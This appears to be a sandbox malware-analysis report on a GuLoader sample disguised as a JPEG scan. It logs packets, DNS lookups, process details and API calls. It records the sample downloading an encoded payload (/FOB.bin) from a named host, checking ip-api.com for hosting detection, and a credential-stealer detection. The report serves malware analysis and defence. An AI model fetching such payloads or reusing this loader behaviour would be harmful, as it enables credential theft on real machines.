May 22, 2024 20:14:52.177503109 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177516937 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177551031 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177572012 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177609921 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177628040 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177684069 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177685022 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177732944 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177740097 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177788973 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177795887 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177836895 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177853107 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177892923 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177907944 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177941084 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177963972 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178019047 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178023100 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.178071022 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.178076029 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178131104 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178141117 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.178141117 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.178186893 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178236961 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.178244114 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178298950 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178338051 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.178354979 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178411007 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178412914 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.178466082 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178503990 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.178553104 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.178607941 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.178628922 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178687096 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178741932 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178790092 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.178841114 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.178874969 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178932905 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.178936958 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.178988934 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179023981 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179044008 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179100990 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179128885 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179128885 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179156065 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179214001 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179225922 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179267883 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179275036 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179322958 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179323912 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179373026 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179378986 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179421902 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179434061 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179491043 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179492950 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179541111 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179547071 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179604053 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179609060 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179657936 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179660082 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179688931 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179699898 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179702997 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179711103 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179752111 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179768085 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179816961 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179826021 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179874897 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179874897 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179920912 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.179924011 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.179933071 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.180022001 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.180071115 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.180169106 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.415254116 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.415277004 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.415425062 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.415425062 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.415453911 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.415477991 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.415594101 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.415649891 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.416726112 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.416846991 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.416920900 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.416955948 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.416979074 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.417017937 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.417104006 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.417104006 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.417176008 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.417273998 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.417327881 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.417399883 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.417464972 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.417484999 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.417568922 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.417587042 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.417623043 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.417623043 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.417668104 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.417716980 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.417720079 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.417783976 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.417927980 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.417938948 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.417939901 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.418071032 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.418071032 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.418190956 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.418205023 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.418314934 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.418314934 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.418404102 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.418510914 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.418559074 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.418665886 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.418818951 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.418833971 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.418845892 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.418857098 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.419003963 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.419044971 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.419087887 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.419186115 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.419186115 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.419323921 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.419339895 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.419421911 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.419461966 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.419507980 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.419589996 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.419589996 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.419696093 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.419720888 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.419910908 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.419930935 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.419935942 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.420083046 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.420187950 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.420306921 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.420317888 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.420404911 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.420420885 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.420500040 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.420536995 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.420577049 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.420778990 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:54.032672882 CEST	59327	80	192.168.11.20	208.95.112.1
May 22, 2024 20:14:54.208089113 CEST	80	59327	208.95.112.1	192.168.11.20
May 22, 2024 20:14:54.208214998 CEST	59327	80	192.168.11.20	208.95.112.1
May 22, 2024 20:14:54.208735943 CEST	59327	80	192.168.11.20	208.95.112.1
May 22, 2024 20:14:54.384155035 CEST	80	59327	208.95.112.1	192.168.11.20
May 22, 2024 20:14:54.432262897 CEST	59327	80	192.168.11.20	208.95.112.1
May 22, 2024 20:14:57.182302952 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:57.182425022 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:15:28.314335108 CEST	80	59327	208.95.112.1	192.168.11.20
May 22, 2024 20:16:40.737230062 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:16:41.315152884 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:16:42.486804962 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:16:44.814413071 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:16:49.454058886 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:16:58.717505932 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:17:17.229078054 CEST	59326	80	192.168.11.20	192.250.227.27

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 22, 2024 20:14:50.759366989 CEST	64952	53	192.168.11.20	1.1.1.1
May 22, 2024 20:14:50.980803013 CEST	53	64952	1.1.1.1	192.168.11.20
May 22, 2024 20:14:53.852298975 CEST	49937	53	192.168.11.20	1.1.1.1
May 22, 2024 20:14:54.028419971 CEST	53	49937	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 22, 2024 20:14:50.759366989 CEST	192.168.11.20	1.1.1.1	0x49a3	Standard query (0)	veysiseker.com	A (IP address)	IN (0x0001)	false
May 22, 2024 20:14:53.852298975 CEST	192.168.11.20	1.1.1.1	0x36fc	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 22, 2024 20:14:50.980803013 CEST	1.1.1.1	192.168.11.20	0x49a3	No error (0)	veysiseker.com		192.250.227.27	A (IP address)	IN (0x0001)	false
May 22, 2024 20:14:54.028419971 CEST	1.1.1.1	192.168.11.20	0x36fc	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

veysiseker.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	59326	192.250.227.27	80	7232	C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 20:14:51.221993923 CEST	166	OUT	GET /FOB.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: veysiseker.com Cache-Control: no-cache
May 22, 2024 20:14:51.464617968 CEST	1289	IN	HTTP/1.1 200 OK Date: Wed, 22 May 2024 18:14:51 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade Last-Modified: Tue, 21 May 2024 07:48:07 GMT Accept-Ranges: bytes Content-Length: 245312 Vary: Accept-Encoding,User-Agent Content-Type: application/octet-stream Data Raw: 3f 7a 41 fa 5a 24 16 c4 05 df 65 0b 10 7d 93 f2 9b 30 3a 27 c5 11 e4 48 10 3f 50 98 72 b6 21 b8 b8 f7 cd 1c e7 39 8f e7 49 49 30 a0 ee 2f 4f b6 8a 50 6d 8f 77 96 c9 68 ee 3e 40 28 a7 0f cb e1 e9 99 de d3 34 0d b0 84 8e a7 b4 a0 01 05 de ab c9 c7 5f b6 3a 90 46 63 60 28 24 a6 00 fe a0 52 35 d5 fb b3 60 49 2e 70 6d 50 64 d1 7d 0e bc 60 81 24 b1 6c f2 82 59 25 6d 2c c2 fd 32 4f c1 0e 8f 34 73 16 45 bc 13 75 4a 90 48 53 b0 e6 50 82 23 3a 6b 88 d3 cd 16 c4 74 8e 02 3e 32 de eb 4a 0e b0 ba d2 3c 9d 44 16 ab 31 91 9a e7 e5 c9 0b 8c c0 57 dc fc 9e 04 76 89 e7 42 a1 da 8a a0 d2 37 e6 31 2c 51 d7 21 c1 79 b3 48 d4 16 32 6c 65 34 bd 89 da 02 0d 1e 41 3d 30 b6 62 8c 20 53 bc 09 dd 11 70 34 e6 fb d9 69 5a 4d 44 04 d1 2d 20 18 f6 dd 4b 48 8e 82 e1 b6 73 77 c2 30 84 46 0c 65 97 4e 7d 97 bc a0 62 64 ad 94 32 e6 03 1f 16 68 ca 7b 09 34 61 da ab 5c 27 0b ea 87 13 e1 06 ce d3 50 c8 6f 1c 9c 4a 58 50 6f 90 3f e4 a6 b6 f4 db 43 14 94 3d 1b 97 b0 2a 72 bc fe f7 54 4d f5 62 dc 12 dd bb 4d 93 8e 1b c0 1e 44 c2 3f 04 1a a4 [TRUNCATED] Data Ascii: ?zAZ$e}0:'H?Pr!9II0/OPmwh>@(4_:Fc`($R5`I.pmPd}`$lY%m,2O4sEuJHSP#:kt>2J<D1WvB71,Q!yH2le4A=0b Sp4iZMD- KHsw0FeN}bd2h{4a\'PoJXPo?C=rTMbMD?g8!#Y;&<K$'~/@ P4-U1Gz'ky@?,{t_uM`Yd/ O`hens\!4.>H6#P`'I.w\|5bt]4\|c24}Fpp3.@~sx717rn-u?Av> e["?5P<1'}(RYeEacMTTAr&SccvUso;,NnT>}/8CM-)=}1t^?W F$:!jfR?sG;_U_B];F8R(~_ON"92f$-Y.i"fSL\|DY[xB:+q^}tE<+9Qu&;(8@4aw.8WOJS-[.6)B,Ody@@&x-8-m9TT5-P;nw@x8X*O [TRUNCATED]
May 22, 2024 20:14:51.464632988 CEST	1289	IN	Data Raw: 0f 24 82 f5 5c 0d 80 e1 be a0 be 66 5e f3 b5 a9 64 26 d5 e3 f6 64 2b 1b ff 45 9d 1c a8 d0 18 93 9b 6b 66 d9 d7 a9 af 80 2d 60 45 41 cd 85 59 0d 89 38 f4 bb e7 dc 11 bd ec 87 48 2f b4 05 fb 0f d0 90 c9 7b 39 fd 6b ae 3f 72 78 e2 e6 bb 68 77 3c 01 Data Ascii: $\f^d&d+Ekf-`EAY8H/{9k?rxhw<+dZLuM8oOsSsg${A~[yUP`L7\O@/aT)>4;vM.,{AN#N,dTwcgRL/2cqhB =<ihyp:^4Y'y@ag4
May 22, 2024 20:14:51.464770079 CEST	1289	IN	Data Raw: 16 c5 32 7a d6 f4 ae 31 37 d1 88 b0 70 46 3c 2a cd 7f 21 e9 4d 1b cc 31 fd 7e 0e 8b bd c5 ae e6 0d 33 84 fc 78 ee 22 22 f8 f7 21 17 c9 61 fc 11 20 ba 91 f8 cd 73 7f 88 c2 30 d2 bb 17 48 34 ba c1 78 f2 3b 61 e2 56 b5 35 e9 30 7e 2b db 72 82 f4 fe Data Ascii: 2z17pF<!M1~3x""!a s0H4x;aV50~+rxqvEkahdT\|kl]/(qa`OvAFsoFK>g;)vJ3nQm}9F$`J[m3Qz=GKbi)Lrsq)TN<+g(@St9
May 22, 2024 20:14:51.464785099 CEST	1289	IN	Data Raw: d0 e0 39 13 8e 56 78 13 73 30 4a f1 f0 4c 87 42 b6 b6 65 b1 f9 75 8b 2e f4 22 70 ff 6e 93 a5 8c d0 4e d3 3d 0f b3 ac 61 a6 b4 a6 fc fe f6 46 70 c7 59 b4 3f b8 a9 62 20 2e 26 a8 04 d6 51 53 35 d3 f9 bd 65 61 dd 71 6d 56 66 df 7b 26 49 61 81 22 9b Data Ascii: 9Vxs0JLBeu."pnN=aFpY?b .&QS5eaqmVf{&Ia"r%m(L+2[aQk(M5_IKs"Yy&z/z)#beL&x6t_2hODahPLGy, HRw2;`JWCb0#bV
May 22, 2024 20:14:51.464796066 CEST	1289	IN	Data Raw: fa 03 87 de ce 10 c4 35 c6 b4 a5 4a b2 af 20 f1 0a 77 c1 fc 27 bf e8 6a cd 21 07 99 41 e3 4e a0 1d 49 3e 27 95 3f 68 77 2f 0c c9 0b 8b 5b 86 39 64 5b b2 49 a5 b5 20 c0 c2 31 27 ef 9d b4 c3 f6 56 04 25 f0 fa 56 8f 8b 88 ce 01 65 14 17 91 96 17 86 Data Ascii: 5J w'j!ANI>'?hw/[9d[I 1'V%Ve-&Nj~&g3DmF+ZW[y)2fw]'V~mCgr!MX6z9Z<Q2Rge'(v,h-<tJbFx#S<t9
May 22, 2024 20:14:51.464807987 CEST	1289	IN	Data Raw: 49 4e 6c e4 24 53 92 21 d6 51 87 45 a5 e4 5c 31 d0 0a 03 b3 58 98 d1 b8 88 3a 23 ae 40 65 98 26 c1 71 bc 18 45 d6 ea 3b c7 ec ca 2f 65 a4 34 93 4c 9f 73 76 ca 41 f3 91 ad a0 cd 11 97 57 bd cc e1 e2 c2 09 d7 fd 4a e2 d0 fd 04 fb 62 71 b1 49 ba 2b Data Ascii: INl$S!QE\1X:#@e&qE;/e4LsvAWJbqI+#<><'vtrL-\;U#H}=8+U#Z(fEu,FcTOS>fVf.QK`vd!3vVfY]zXss<Jl
May 22, 2024 20:14:51.464818954 CEST	1289	IN	Data Raw: 9d ec 38 b4 01 8e ac 27 81 ff 86 90 f3 59 58 fa 38 18 ec d8 30 ca 15 bf 43 d0 24 a1 d9 b6 9d 66 8f 1e c4 d1 4c ed 20 af f6 f1 1c 8f f2 33 35 2d 25 71 36 d5 9c 31 f6 b9 74 81 ff 99 6d d0 24 6b 59 89 40 c6 3f d2 72 39 f0 74 87 ba a1 c4 74 95 6d fd Data Ascii: 8'YX80C$fL 35-%q61tm$kY@?r9ttm`YUf/"Oh/w\.b=h\DIv\|o{4\|J<7JsP3.q2ax717ru#`1A\|vzE tE["9yX)?
May 22, 2024 20:14:51.464829922 CEST	1289	IN	Data Raw: dc dc b7 52 4a 2a 8b d9 79 15 3c 68 46 2a c5 95 38 69 e5 15 7a e1 08 91 cc a1 5f c1 8d 46 37 48 24 7b 00 79 cc b7 40 7a af 9e 91 69 d9 4e ff 4a d8 59 de 3d 4e 6c 98 59 d5 54 9c ee f0 8b cf 84 64 82 24 f1 fa 60 2b bd 7a a5 de 65 76 0c 1a f6 4c 5e Data Ascii: RJy<hF8iz_F7H${y@ziNJY=NlYTd$`+zevL^{O>[J>8ae~O[^JYGyhpiz?l(6~f7JoS[XDOea7v _HsuV"pX[=B7'q_+Fc (
May 22, 2024 20:14:51.464875937 CEST	1289	IN	Data Raw: c5 ed 56 ae 87 e0 51 ea b0 42 1d 27 47 8b fb 21 2d 08 69 a2 2e 49 37 a9 dd 82 3c 32 66 d1 00 76 99 cb 85 b5 9c b7 02 51 e1 cf 7f 45 77 c6 c8 b4 5c ea 4e 39 6e df f8 12 29 82 b7 7b b4 1b d2 f0 15 86 52 65 60 23 a9 13 65 a8 67 96 bd 37 fa c0 16 55 Data Ascii: VQB'G!-i.I7<2fvQEw\N9n){Re`#eg7Ubp!)H\|+,Y5s[D,N\|k4/0F<m.75UP:Y ScI1} 5KZjK,'ajx$2$?+w/[j[U 9+R
May 22, 2024 20:14:51.464886904 CEST	1289	IN	Data Raw: 5f 84 eb 3b ad a0 80 e6 32 b3 2b d0 b0 06 0b de b0 5c 1e 46 94 9b 48 77 e7 c1 00 b0 12 88 7d 51 f2 fe ea 11 14 36 39 71 90 a7 ab 24 46 97 83 e7 93 87 44 9e 5f d7 02 87 cb 10 8d c3 51 91 50 2b 3e a9 73 4b 62 63 d5 33 97 d0 09 42 bb 67 90 ac ee 5b Data Ascii: _;2+\FHw}Q69q$FD_QP+>sKbc3Bg[7Vl<xuJ(-ZoEEOVZ+K'SW`5Yb@\|)He]-'d9K@lZ^'sE<+`$}Quf(I$@a*2
May 22, 2024 20:14:51.701567888 CEST	1289	IN	Data Raw: 6e d6 b7 1c 11 3d 78 8b 2a c3 b9 a3 da f5 77 e1 af 39 47 dc 92 09 a1 e6 e7 42 a1 fc 57 a0 d2 67 a3 11 2c 1d d6 22 eb 46 36 0f b2 16 cc 62 67 34 bd 77 d6 e0 0d 3c 40 36 31 bd 9c 8d ad 5a bc 09 d5 11 50 35 e6 fb d9 39 86 4c 44 04 0f 21 22 18 36 dc Data Ascii: n=xw9GBWg,"F6bg4w<@61ZP59LD!"6KH<Vw0CavhC_lx4\|'@oFXPn?GtL'5eR/#Ye,A.*'I}6/@EP4-?1Fzg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	59327	208.95.112.1	80	7232	C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 20:14:54.208735943 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
May 22, 2024 20:14:54.384155035 CEST	174	IN	HTTP/1.1 200 OK Date: Wed, 22 May 2024 18:14:53 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 74 72 75 65 0a Data Ascii: true

Target ID:	2
Start time:	14:14:27
Start date:	22/05/2024
Path:	C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"
Imagebase:	0x400000
File size:	379'400 bytes
MD5 hash:	18776562551C3ADCDC9F49C013772FBD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.19322780922.0000000005951000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:14:27
Start date:	22/05/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Imagebase:	0x7ff7bd9e0000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:14:46
Start date:	22/05/2024
Path:	C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"
Imagebase:	0x400000
File size:	379'400 bytes
MD5 hash:	18776562551C3ADCDC9F49C013772FBD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.24172966883.0000000033875000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	18.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.2%
Total number of Nodes:	1508
Total number of Limit Nodes:	38

Executed Functions

Function 004031D6 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004031FB
GetVersion.KERNEL32 ref: 00403201
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403234
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403270
OleInitialize.OLE32(00000000), ref: 00403277
SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403293
GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 004032A8
